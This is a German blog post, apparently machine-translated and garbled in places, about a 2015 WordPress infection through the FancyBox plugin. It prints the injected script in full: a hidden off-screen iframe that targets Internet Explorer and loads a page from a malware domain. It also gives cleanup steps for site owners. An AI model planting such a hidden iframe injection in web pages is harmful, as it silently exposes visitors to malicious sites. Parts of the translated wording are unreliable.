Anfang dieser Woche eine Reihe von Websites und Blogs WordPresserhielt Warnungen von Malware-Infektion durch Google Webmaster.
Das Problem, das Google Webmaster bezeichnet wird, um das Vorhandensein eines Code / Skript Iframe-Malware die Source-Web-Seite.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Es scheint, dass es sich um ein Verletzlichkeit a PluginBesitzstand FancyBox für WordPress was bis gestern (05.02.2015) nicht für eine lange Zeit aktualisiert.
Dieses Problem zu lösen, und Desinfektion von Viren Websites mit dieser Malware, ist relativ einfach.
1. Deaktivieren Sie das FancyBox-Plugin.
2. Lösche alle FancyBox Plugin Dateien vom Server (via FTP)
3. Installieren Sie die neue Version des Plugins (Fancybox 3.0.4)
FancyBox für WordPress 3.0.4
– Die Einstellung, die von dem in 3.0.3 erwähnten Sicherheitsproblem betroffen ist, wurde umbenannt. Dies sollte verhindern, dass der bösartige Code auf Websites erscheint, auf denen sich das Plugin befindet updated, ohne den bösartigen Code zu entfernen.
FancyBox für WordPress 3.0.3
- Es wurde ein Sicherheitsproblem.
Malware Info:
TYP: Iframe-Umleitung
TARGET: WordPress schicke Kiste
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
Malware RAW CODES:
MALWARE SCHRIFTLICH: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Entfernen Sie Malware von Ihrem WordPress Website .